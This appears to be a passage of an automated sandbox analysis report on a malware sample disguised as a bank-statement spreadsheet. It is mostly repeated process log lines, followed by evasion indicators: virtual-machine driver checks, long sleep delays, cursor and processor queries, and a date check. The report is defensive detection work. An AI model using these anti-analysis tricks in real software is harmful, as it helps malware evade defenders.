                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Contains functionality to detect sleep reduction / modificationsShow sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004301100_2_00430110
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_004301102_2_00430110
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile opened / queried: C:\Windows\system32\drivers\VBoxMouse.sys
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile opened / queried: C:\Windows\system32\drivers\vmmouse.sys
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile opened / queried: C:\Windows\system32\drivers\VBoxGuest.sys
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile opened / queried: C:\Windows\system32\drivers\vmhgfs.sys
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,7_2_00408836
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_00453E74
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,2_2_00453E74
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 300000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 180000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 300000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 300000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 180000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 300000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 300000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_004301102_2_00430110
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4780Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4864Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5780Thread sleep time: -140000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6916Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6840Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -99859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -99750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -99656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -99547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -99453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -99359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -99203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -99109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -99000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -98906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -98797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -98656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -98547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -98453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -98359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -98250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -98109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -98000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -97906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -97797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -97703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -97609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -97453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -97359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -97250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -97156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 4116Thread sleep time: -97047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 1808Thread sleep count: 273 > 30Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5380Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5392Thread sleep time: -140000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5532Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 864Thread sleep count: 48 > 30
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6600Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6660Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5984Thread sleep time: -140000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6112Thread sleep time: -300000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 7048Thread sleep time: -180000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -100000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -99890s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -99750s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -99640s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -99547s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -99437s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -99343s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -99250s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -99093s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -99000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -98890s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -98797s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -98687s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6676Thread sleep time: -98547s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6244Thread sleep count: 90 > 30
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6848Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5628Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5468Thread sleep time: -140000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5564Thread sleep time: -300000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5732Thread sleep count: 48 > 30
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5948Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6864Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6960Thread sleep time: -140000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 6148Thread sleep time: -300000s >= -30000s
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5544Thread sleep count: 48 > 30
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe TID: 5840Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0046A9D0 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 0046A9EBh0_2_0046A9D0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0046A9D0 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 0046A9EBh2_2_0046A9D0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00408900 FindFirstFileA,GetLastError,0_2_00408900
